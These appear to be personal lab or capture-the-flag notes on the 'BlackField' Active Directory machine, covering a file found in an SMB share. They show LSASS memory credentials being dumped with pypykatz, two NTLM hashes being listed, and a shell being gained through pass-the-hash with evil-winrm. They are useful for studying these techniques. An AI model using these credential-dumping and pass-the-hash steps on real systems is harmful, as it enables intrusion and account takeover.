BlackField
05-Nmap
10-Recon
15-AS-REP Roast
20-LDAP
25 - Kerberosting
30 - bloodhound-python
35-ChangingPasswordForAudit2020
40-InterestingFilesInSMBshare
45-Enumeration
50-Getting ntds.dit
55-Getting Root.txt
40-InterestingFilesInSMBshare

Pasted image 20240112111353.png
lsass.zip is the interesting file

commands_output ls
domain_admins.txt  domain_users.txt    ipconfig.txt  route.txt       tasklist.txt
domain_groups.txt  firewall_rules.txt  netstat.txt   systeminfo.txt
➜  commands_output cat domain_admins.txt 
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator       Ipwn3dYourCompany     
The command completed successfully.

Found how to dump password from lsass.dmp file
https://en.hackndo.com/remote-lsass-dump-passwords/

pypykatz lsa minidump lsass.DMP

Pasted image 20240112112215.png
Got 2 ntlm hashes

svc_backup:9658d1d1dcd9250115e2205d9f48400d
Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62

Got shell using svc_backup hash and evilwinrm

Pasted image 20240112112614.png

Marked user svc_backup as owned in bloodhound

Shortest path from owned_priniciples
Pasted image 20240112112758.png

Table Of Contents